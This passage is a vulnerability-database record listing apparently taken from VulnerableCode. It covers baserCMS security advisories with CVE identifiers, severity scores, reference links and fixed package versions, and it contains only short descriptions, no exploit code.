scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-39136
reference_id CVE-2021-39136
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-39136
fixed_packages
0
url pkg:composer/baserproject/basercms@4.5.1
purl pkg:composer/baserproject/basercms@4.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-j37y-gws9-ake9
12
vulnerability VCID-jby7-s5ez-dqb3
13
vulnerability VCID-k575-suuf-7bhf
14
vulnerability VCID-k5qv-4yp3-zbgf
15
vulnerability VCID-khft-xvrw-g3dr
16
vulnerability VCID-kmpp-6j49-pqfz
17
vulnerability VCID-mfm9-gsh3-ubg8
18
vulnerability VCID-nxrf-64er-xbfx
19
vulnerability VCID-p695-t9ye-v3ga
20
vulnerability VCID-pd8c-9d7z-zkhg
21
vulnerability VCID-sqr4-v889-tff8
22
vulnerability VCID-u16w-rbuk-ybfs
23
vulnerability VCID-uedz-j2vn-cbea
24
vulnerability VCID-y2sz-c6vb-pkdp
25
vulnerability VCID-zqd4-rdem-jfgk
26
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.1
aliases CVE-2021-39136, GHSA-hgjr-632x-qpp3
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hpk4-a6tr-3ffe
14
url VCID-j37y-gws9-ake9
vulnerability_id VCID-j37y-gws9-ake9
summary
Unrestricted Upload of File with Dangerous Type
baserCMS is a Content Management system. Prior to version 4.7.5, there is a Remote Code Execution (RCE) Vulnerability in the management system of baserCMS. Version 4.7.5 contains a patch.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-25654
reference_id
reference_type
scores
0
value 0.02083
scoring_system epss
scoring_elements 0.84309
published_at 2026-06-04T12:55:00Z
1
value 0.02083
scoring_system epss
scoring_elements 0.84332
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-25654
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96
3
reference_url https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359
4
reference_url https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0
5
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-25654
reference_id CVE-2023-25654
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-25654
7
reference_url https://github.com/advisories/GHSA-h4cc-fxpp-pgw9
reference_id GHSA-h4cc-fxpp-pgw9
reference_type
scores
url https://github.com/advisories/GHSA-h4cc-fxpp-pgw9
8
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9
reference_id GHSA-h4cc-fxpp-pgw9
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.5
purl pkg:composer/baserproject/basercms@4.7.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-jby7-s5ez-dqb3
9
vulnerability VCID-k5qv-4yp3-zbgf
10
vulnerability VCID-khft-xvrw-g3dr
11
vulnerability VCID-mfm9-gsh3-ubg8
12
vulnerability VCID-nxrf-64er-xbfx
13
vulnerability VCID-p695-t9ye-v3ga
14
vulnerability VCID-pd8c-9d7z-zkhg
15
vulnerability VCID-sqr4-v889-tff8
16
vulnerability VCID-u16w-rbuk-ybfs
17
vulnerability VCID-uedz-j2vn-cbea
18
vulnerability VCID-y2sz-c6vb-pkdp
19
vulnerability VCID-zqd4-rdem-jfgk
20
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5
aliases CVE-2023-25654, GHSA-h4cc-fxpp-pgw9
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-j37y-gws9-ake9
15
url VCID-jby7-s5ez-dqb3
vulnerability_id VCID-jby7-s5ez-dqb3
summary Cross-Site Request Forgery (CSRF) in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-43649
reference_id
reference_type
scores
0
value 0.00118
scoring_system epss
scoring_elements 0.3025
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-43649
1
reference_url https://basercms.net/security/JVN_99052047
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/
url https://basercms.net/security/JVN_99052047
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/
url https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-43649
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-43649
5
reference_url https://github.com/advisories/GHSA-fw9x-cqjq-7jx5
reference_id GHSA-fw9x-cqjq-7jx5
reference_type
scores
url https://github.com/advisories/GHSA-fw9x-cqjq-7jx5
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5
reference_id GHSA-fw9x-cqjq-7jx5
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0
purl pkg:composer/baserproject/basercms@5.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0
aliases CVE-2023-43649, GHSA-fw9x-cqjq-7jx5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jby7-s5ez-dqb3
16
url VCID-k575-suuf-7bhf
vulnerability_id VCID-k575-suuf-7bhf
summary
baserCMS vulnerable to stored Cross-site Scripting
Stored cross-site scripting vulnerability in Permission Settings of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-41994
reference_id
reference_type
scores
0
value 0.00143
scoring_system epss
scoring_elements 0.34314
published_at 2026-06-04T12:55:00Z
1
value 0.00143
scoring_system epss
scoring_elements 0.34412
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-41994
1
reference_url https://basercms.net/security/JVN_53682526
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/
url https://basercms.net/security/JVN_53682526
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://jvn.jp/en/jp/JVN53682526/index.html
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/
url https://jvn.jp/en/jp/JVN53682526/index.html
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-41994
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-41994
5
reference_url https://github.com/advisories/GHSA-vxwf-79ch-f7f7
reference_id GHSA-vxwf-79ch-f7f7
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vxwf-79ch-f7f7
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.2
purl pkg:composer/baserproject/basercms@4.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-j37y-gws9-ake9
9
vulnerability VCID-jby7-s5ez-dqb3
10
vulnerability VCID-k5qv-4yp3-zbgf
11
vulnerability VCID-khft-xvrw-g3dr
12
vulnerability VCID-mfm9-gsh3-ubg8
13
vulnerability VCID-nxrf-64er-xbfx
14
vulnerability VCID-p695-t9ye-v3ga
15
vulnerability VCID-pd8c-9d7z-zkhg
16
vulnerability VCID-sqr4-v889-tff8
17
vulnerability VCID-u16w-rbuk-ybfs
18
vulnerability VCID-uedz-j2vn-cbea
19
vulnerability VCID-y2sz-c6vb-pkdp
20
vulnerability VCID-zqd4-rdem-jfgk
21
vulnerability VCID-zsgc-fnen-b7a6
22
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2
aliases CVE-2022-41994, GHSA-vxwf-79ch-f7f7
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k575-suuf-7bhf
17
url VCID-k5qv-4yp3-zbgf
vulnerability_id VCID-k5qv-4yp3-zbgf
summary
baserCMS has an SQL injection vulnerability in its blog post functionality
baserCMS has a SQL injection vulnerability in blog posts.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability

Malicious SQL may be executed in blog posts.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information.
https://basercms.net/security/JVN_52157568

### Credits

Mirai Matsumoto@Future Secure Wave, Inc.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-27697
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02096
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-27697
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-27697
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-27697
6
reference_url https://github.com/advisories/GHSA-vh89-rjph-2g7p
reference_id GHSA-vh89-rjph-2g7p
reference_type
scores
url https://github.com/advisories/GHSA-vh89-rjph-2g7p
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-27697, GHSA-vh89-rjph-2g7p
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k5qv-4yp3-zbgf
18
url VCID-khft-xvrw-g3dr
vulnerability_id VCID-khft-xvrw-g3dr
summary
baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request
XSS vulnerability in the HTTP 400 Bad Request response of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46995
reference_id
reference_type
scores
0
value 0.0087
scoring_system epss
scoring_elements 0.75582
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46995
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_00876083
2
reference_url https://basercms.net/security/JVN_06274755
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/
url https://basercms.net/security/JVN_06274755
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46995
reference_id CVE-2024-46995
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46995
5
reference_url https://github.com/advisories/GHSA-mr7q-fv7j-jcgv
reference_id GHSA-mr7q-fv7j-jcgv
reference_type
scores
url https://github.com/advisories/GHSA-mr7q-fv7j-jcgv
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv
reference_id GHSA-mr7q-fv7j-jcgv
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46995, GHSA-mr7q-fv7j-jcgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-khft-xvrw-g3dr
19
url VCID-kmpp-6j49-pqfz
vulnerability_id VCID-kmpp-6j49-pqfz
summary
baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability
There is a cross-site scripting vulnerability on the management system of baserCMS.

This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
If this applies to you, please update to the new version as soon as possible.

### Target
baserCMS 4.7.1 and earlier versions.

### Vulnerability
Execution of malicious JavaScript code may alter the display of the page or leak cookie information.
- In Favorite registration (CVE-2022-39325)
- In Permission Settings (CVE-2022-41994)
- In User group management (CVE-2022-42486)

### Countermeasures
Update to the latest version of baserCMS

### Credits
- Shogo Iyota@Mitsui Bussan Secure Directions, Inc.
- YUYA KOTAKE@CARTA HOLDINGS, INC.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-39325
reference_id
reference_type
scores
0
value 0.00687
scoring_system epss
scoring_elements 0.72163
published_at 2026-06-05T12:55:00Z
1
value 0.00687
scoring_system epss
scoring_elements 0.72122
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-39325
1
reference_url https://basercms.net/security/JVN_53682526
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/
url https://basercms.net/security/JVN_53682526
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/
url https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-39325
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-39325
7
reference_url https://github.com/advisories/GHSA-395x-wv32-44v5
reference_id GHSA-395x-wv32-44v5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-395x-wv32-44v5
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.2
purl pkg:composer/baserproject/basercms@4.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-j37y-gws9-ake9
9
vulnerability VCID-jby7-s5ez-dqb3
10
vulnerability VCID-k5qv-4yp3-zbgf
11
vulnerability VCID-khft-xvrw-g3dr
12
vulnerability VCID-mfm9-gsh3-ubg8
13
vulnerability VCID-nxrf-64er-xbfx
14
vulnerability VCID-p695-t9ye-v3ga
15
